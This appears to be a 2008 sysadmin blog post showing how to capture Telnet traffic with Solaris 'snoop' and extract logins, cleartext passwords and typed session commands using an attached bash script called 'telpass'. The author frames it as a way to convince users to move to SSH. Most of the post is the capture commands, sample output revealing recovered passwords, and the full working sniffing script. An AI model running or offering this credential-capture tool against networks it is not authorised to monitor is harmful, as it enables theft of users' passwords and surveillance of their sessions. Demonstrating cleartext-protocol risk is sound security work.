Tuesday, April 15, 2008

Capturing Logins And Passwords With Solaris Snoop

Hey There,

Today, we're going to take a look at parsing the output from "snoop" (specifically tested on Solaris Unix 9 and 10, but almost definitely backward compatible to Solaris 8) and printing out logins, passwords and simple session information. We'll try to keep the explanation short today, since the examples are long ;)

As a quick note, since we've received more than a few emails on the subject (requesting illegal services we don't provide): Although today's post, and the attached script, will show you how to do something that (under the correct circumstances) could be illegal, unethical or both, we're only presenting it as a tool to help promote security; much like we've done before in posts regarding encrypted passwords, password cracking and so forth. It is not our intention to encourage malicious behaviour; only to bring focus on security-related issues that have been around for a long time and (for some reason) are still treated as minor nuisances.

Hopefully the bash shell script attached at the bottom will be helpful to a few sys admins out there. If you work on a network that allows users to Telnet (or use rsh or any other form of unencrypted network protocol), you may have been on the losing end of an argument about how the stealing of passwords transmitted in cleartext "never really happens."

For those of you afflicted by the aforementioned condition: Good news! You can make it happen (and do it ethically) today. With any luck, the output our script provides from a simple snoop on the Telnet port will make an impression for the positive and convince those users who (for some reason) don't want to use SSH, to finally make the switch :) Note that in order to run the "snoop" command you must be either root, or have gained elevated privileges through some other manner.

Following is the demonstration of a few simple sessions, and the output you can expect to see from the script. You may see quite a bit more since we had to do this in a limited environment and eventually got sick of logging in and out of the server we were snooping on ;) Since some of these examples are extensive, even though we weeded out tons of output, we've included anchor links so you can hop past any particular step rather than having to scroll down through the example output.

1. On the server accepting Telnet connections, we started up this command to capture all output to a snoop binary file (named "output_file") and only listen to port 23 (Telnet):
Skip to Step 2

host # snoop -o output_file port 23
Using device /dev/qfe (promiscuous mode)
616 ^C
<--- That was the entirety of our snooping process, which is scary in itself.

2. During the time snoop was running on that server, we logged into it multiple times, did a few things, typed our password wrong, logged in again, etc, as seen below (we've clipped a lot of boring warning messages and replaced useless output from our sessions with ellipses (...) - As usual, host names, logins, IP addresses and passwords have been changed to protect the somewhat innocent ;)
Skip to Step 3

host_1 # telnet host
Trying 99.99.99.99...
Connected to host
Escape character is '^]'.
...
SunOS 5.9
...
login: user51
Password:
...
host # ls
file1 file2 file3 file4
file5 file6 file7 file8
host # cd /usr/local
host # pwd
/usr/local
host # exit
logout
...

host_1# telnet host
Trying 99.99.99.99...
Connected to host
Escape character is '^]'.
...
SunOS 5.9
...
login: user51
Password:
...
host # cat .profile
set -o vi
...
host # exit
logout
...
host_1 # telnet host
Trying 99.99.99.99...
Connected to host
Escape character is '^]'.
...
SunOS 5.9
...
login: user51
Password:
Login incorrect
login: user51
Password:
host # ls
file1 file2 file3 file4
file5 file6 file7 file8
host # w
2:03pm up 17 day(s), 2 users, load average: 0.39, 0.18, 0.12
User tty login@ idle JCPU PCPU what
...
host # whodo
Mon Apr 14 20:30 CDT 2008
...
host # exit
logout
...
host_1 # telnet host
Trying 99.99.99.99...
Connected to host
Escape character is '^]'.
...
SunOS 5.9
...
login: user51
Password:
host # id
uid=55787(user51) gid=666(forx)
host # exit
logout


3. Then we read the binary snoop file into an ascii text file using snoop's default settings, ran our script (which we named "telpass" to continue our tradition of blatant unoriginality), and watched the logins and passwords come on out:
Skip to Step 4

host # snoop -i output_file >ascii_net_out 2>&1
host # ./telpass ascii_net_out

Possible session info to follow:
........
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
....ls...c.d../u.sr./l.oca.l...pw.d...ex.it...........
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
...c.at....pr.of.il.e...ex.it...........
Possible login ID to follow:
user51
Possible password to follow:
sm@ckM3
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
....ls...w...wh.od.o...ex.it...........
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
...i.d...exi.t...


4. And, finally we ran snoop with medium-extra verbosity, and pumped that into an ascii text file, as well. This provides a little more information on the user's command line usage, but may just be a waste of time since you don't really get anything extra for your effort:
Skip to the summary

host # snoop -V -i output_file >binger
host # ./telpass binger

Possible session info to follow:
........................................
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
......................l....s...................c.........d............../....u.........s....r........./....l.........o....c....a.........l...................p....w.........d...................e....x.........i....t...........................................................
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
...................c.........a....t........................p....r.........o....f.........i....l.........e...................e....x.........i....t...........................................................
Possible login ID to follow:
user51
Possible password to follow:
sm@ckM3
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
......................l....s...................w...................w....h.........o....d.........o...................e....x.........i....t...........................................................
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
...................i.........d...................e....x....i.........t.................


Summary: And that's about that :) You notice that at one point, we accidentally entered a bad password, but if you're getting this kind of information, you can't complain ;) The script should be fairly simple to decipher. Note that we do skip alternate packets while reading the login entry (because of the double output from interactive echo which doesn't happen with the "invisible" password). We also skipped alternate packets during the sessions ( for the same reason) and padded empty packets (while we were supposedly thinking of what to do next - or where the next typewriter key was ;) with periods (.) In any event, if you're familiar with Unix or Linux, you can see the commands, directories, etc, from between the dots.

Hope this script helps to keep your work (and maybe even home) network more secure. There's nothing like showing someone their password to convince them that it "does really happen."

Please use responsibly, and best wishes :)


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# telpass - extract password and session information from ascii "snoop" output
#
# 2008 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [ $# -ne 1 ]
then
echo "Usage: $0 snoop_file"
exit 1
fi

snoop_file=$1

if [ ! -f $snoop_file ]
then
echo "Snoop Output $file does not exist. Exiting!"
exit 1
fi

login_or_pwd=0
interactive_echo=0
sess_info=0

while read line
do
echo $line| grep "Last" >/dev/null 2>&1
ll_yes_or_no=$?
if [ $ll_yes_or_no -eq 0 ]
then
echo
login_or_pwd=0
continue
fi
echo $line| grep "login: *$" >/dev/null 2>&1
l_yes_or_no=$?
if [ $l_yes_or_no -eq 0 ]
then
echo
echo "Possible login ID to follow: "
login_or_pwd=1
sess_info=0
continue
fi
echo $line| grep "Password:" >/dev/null 2>&1
p_yes_or_no=$?
if [ $p_yes_or_no -eq 0 ]
then
echo
echo "Possible password to follow: "
login_or_pwd=2
sess_info=0
continue
fi
if [ $login_or_pwd -eq 1 ]
then
if [ $interactive_echo -eq 1 ]
then
interactive_echo=0
continue
else
echo $line|awk -F" " '{ if ( length($NF) == 1 ) print $NF}'|xargs -ivar echo "var\c"
interactive_echo=1
continue
fi
fi
if [ $login_or_pwd -eq 2 ]
then
echo $line|awk -F" " '{ if ( length($NF) == 1 ) print $NF}'|xargs -ivar echo "var\c"
continue
fi
if [ $login_or_pwd -eq 0 -a $sess_info -eq 0 ]
then
echo
echo "Possible session info to follow:"
sess_info=1
fi
if [ $sess_info -eq 1 ]
then
if [ $interactive_echo -eq 1 ]
then
interactive_echo=0
continue
else
echo $line|awk -F" " '{ if ( length($NF) == 1 ) print $NF;else print "."}'|xargs -ivar echo "var\c"
interactive_echo=1
continue
fi
fi
done <$snoop_file
echo
exit 0


, Mike